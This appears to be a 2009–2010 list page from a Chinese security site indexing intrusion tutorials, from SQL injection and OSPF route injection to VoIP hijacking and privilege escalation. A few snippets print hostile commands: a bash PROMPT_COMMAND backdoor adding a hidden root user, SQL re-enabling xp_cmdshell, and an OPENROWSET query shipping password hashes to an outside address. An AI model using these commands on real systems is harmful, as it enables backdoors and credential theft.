首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>入侵实例>列表
让LOOP防下载形同虚设直接拿shell
  日期:2010-02-22 11:21:14 点击:66 评论:0
题目:让LOOP防下载形同虚设直接拿shell--分析沸腾新闻多媒体展望系统V1.2 0Day 作者:莫ㄨ问[B.H.S.T] 李宓 [L4nk0r] 来源:L4nk0r'S Blog 此文章已发表在《黑客手册》2009年第9期杂志上,后经作者发布在博客上,如转载请务必保留此信息 L4nk0r:为方便大家阅读,最后
攻击OSPF:通过链路状态路由协议注入恶意路由
  日期:2010-02-22 11:20:30 点击:652 评论:0
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. 前言 ~~~~~~~ 谁控制了路由协议,谁就控制了整个网络。因此,要对该协议实施充分的安全防护,要采取最严格的措施不会有错!如果该协议失控,就可能导致整个网络失控。 链路状态路由协议(OSPF)用
MYSQL中BENCHMARK函数的利用
  日期:2010-01-27 11:10:28 点击:95 评论:0
第一部 利用时间推延进行注射---BENCHMARK函数在注射中的利用 一.前言/思路 如果你看了angel的《 SQL Injection with MySQL 》一文,你有会发现一般的mysql+php的注射都是通过返回错误信息,和union联合查询替换原来查询语句中的字段而直接输出敏感信息,但是有的时候
企业网络的盲点:利用打印机进行入侵
  日期:2010-01-21 10:45:03 点击:316 评论:1
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. 在每一个公司的网络中,都会存在基于Microsoft Windows的打印机连接到网络上进行共享,因此可用于许多员工在同一时间使用打印服务。本文介绍如何滥用此功能进行本地权限提升或进行打印机服务器上
CityShop v5.5.8 sql injection 0day&后台获取webshell方法
  日期:2010-01-18 11:51:10 点击:62 评论:0
文/My5t3ry 昨天看到论坛上有朋友问CitySHOP后台如何拿SHELL,就下了源码回来读了下,发现代码用zend加密了。 解密后读了下,漏洞还真不少,很多参数都是$_GET后就直接带入sql查询,如: 01 // /section/goods_script.php10-25行 02 03 require_once ( ../libs/session.
详解cisco路由入侵艺术
  日期:2010-01-11 11:32:01 点击:86 评论:0
现在,是数字世界的天下。在喧闹的数字世界底层,存在一种精致的次序,这种次序决定着数据的选路、异构介质衔接、协议的交互等功能。而这一次序的缔造者正是布满整个网络的路由器。于是,路由器成了数据通信的交通亭,也成为了众多黑帽(Blackhat)争夺的目标之一。 Cisco
高级Mysql攻击技术(翻译blackhat 2009文章)
  日期:2010-01-11 11:30:52 点击:75 评论:0
1.简介(文章中的堆查询其实就是联查) 这个文章主要描述怎样再LAMP和WAMP平台上实施远程命令执行代码通过SQL注入漏洞。攻击者再Mysql平台上进行SQL注入必须处理一 些限制和约束。例如,在一个不流行的平台中进行远程命令执行漏洞的一些查询语句缺乏复杂的声明,相对其他平
浅析跨站请求伪造
  日期:2010-01-07 09:39:54 点击:604 评论:0
跨站请求伪造(cross-site request forgery)通常缩写为XSRF,直译为跨站请求伪造,即攻击者通过调用第三方网站的恶意脚本或者利用程序来伪造请求,当然并不需要向用户端伪装任何具有欺骗的内容,在用户不知情时攻击者直接利用用户的浏览器向攻击的应用程序提交一个已经
巧用G6FTPServer账号渗透台湾某图书服务器
  日期:2009-12-21 14:31:18 点击:382 评论:0
某日群里一兄弟给了一个 mysql 的连接地址,当日因为比较忙,所以就一直拖到今天,今天刚好有空,对该服务器进行安全检查,结果不仅获取了该网站的 Webshell ,而且还得到了该服务器的权限,下面将整个过程写出来跟大家分享。 (一)扫描漏洞 扫描漏洞的软件很多,俺喜
利用BASH提权的技巧
  日期:2009-12-21 14:28:44 点击:74 评论:0
要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root 看个BASH的环境变量 $PROMPT_COMMAND 这个变量保存了在主提示符$PS1显示之前需要执行的命令. export PROMPT_COMMAND=/usr/sbin/useradd -o -u 0 kkoo /dev/null echo kkoo:123456 | /usr/sbin/chpasswd /d
关于搜狗拼音输入法提权的应用
  日期:2009-12-21 14:27:49 点击:85 评论:0
朋友提权上遇到困难,2003系统,常规方法都无效。能访问的目录只有网站目录和C:Program Files。所以我仔细看了下Program Files的所有文件夹,搜狗输入法的目录( C:Program FilesSogouInput4.3.0.3315 )是唯一一个有权限写入编辑的目录。那么替换里面的执行文件就是
SQL高级注入使用之储存过程
  日期:2009-12-17 10:22:46 点击:62 评论:0
sql2005恢复xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 零、 ------
运行了VNC服务的主机应怎样提升权限
  日期:2009-12-16 09:38:21 点击:45 评论:0
运行了VNC服务的主机提升权限的具体方法: 默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。 首先用ASP读出注册表中的加密密码,然后用破解工具破解。 我给出大家一个读取VNC密码的ASP脚本,默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Passwo
Linux下渗透嗅探术
  日期:2009-12-14 11:06:24 点击:169 评论:1
内网渗透在攻击层面,其实更趋向于社工和常规漏洞检测的结合,为了了解网内防护措施的设置是通过一步步的刺探和经验积累,有时判断出错,也能进入误区。但是如果能在网内进行嗅探,则能事半功倍,处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破,到控
珍藏版的SQL旁注精华程序
  日期:2009-12-11 10:30:28 点击:54 评论:0
珍藏版的SQL旁注精华代码,如下: 以下是引用片段: insertintoOPENROWSET(SQLOLEDB,uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;,select*from_sysxlogins)select*fromdatabase.dbo.sysxlogins 得到hash之后,就可以进行暴力破解。这需要一点
教你将反射型XSS变成持久型XSS
  日期:2009-12-11 10:29:22 点击:58 评论:0
Anehta -- Boomerang(回旋镖)有大家所不知道的重要作用。 Anehta 中有许多的具有创意的设计, Boomerang , 回旋镖模块 ,正是其中一个。 回旋镖模块的作用,是为了 跨域获取本地cookie 。 Boomerang模块 是专门 针对IE 设计的,对于Firefox的情况,可以使用xcookie模
原始套接字透析方法实现Sniffer
  日期:2009-12-11 10:28:28 点击:56 评论:0
网友们都知道,以太网所有与网络连接的工作站都可以看到网络上传递的数据。通过查看包含在帧中的目标地址,确定是否进行接收或放弃。如果证明数据确实是发给自己的,工作站将会接收数据并传递给高层协议进行处理。但是,如果让网卡置于混杂模式(Promiscuous mode),
How to root a box
  日期:2009-12-11 10:17:27 点击:1221 评论:0
#Trace: Linux 提权教程。 参考视频: [1]http://rapidshare.com/files/109733291/Linux_Rooting.rar.html [2]http://files.ge/file/401011/vidzeo-tar-gz.html Today, I have decided to put up a tutorial for both newbies and pwners! and just reference for all
第二次VoIP攻击部署:偏执狂还是谨慎?
  日期:2009-12-11 10:15:45 点击:91 评论:0
Copyright (c) 2009 Czy Invicta Hack01@Live!cn All rights reserved. 前言 ~~~~~~ 这种攻击能够成功,是因为SIP传送的消息可以清晰捕捉、修改和重播,即使远程SIP代理服务器要求身份验证的用户注册也是如此。这种攻击可以同时针对企业和住宅用户发起攻击。例如,一个
第一次VoIP攻击部署
  日期:2009-12-10 09:59:17 点击:142 评论:0
Copyright (c) 2009 Czy Invicta Hack01@Live!cn All rights reserved. 前言 ~~~~~~~~ 本文所讨论的是众所周知的VoIP,我对目标VoIP部署了两次攻击。第一次攻击演示了劫持用户的VoIP注册签名信息和随后的通信。第二次攻击演示了窃听VoIP通讯信息。虽然VoIP是使用不同的
共26页/516条记录 首页 上一页 [7] [8] [9] 10 [11] [12] [13] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  Exploits
  系统安全
  网络安全
  网络基础
  病毒分析
入侵实例
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved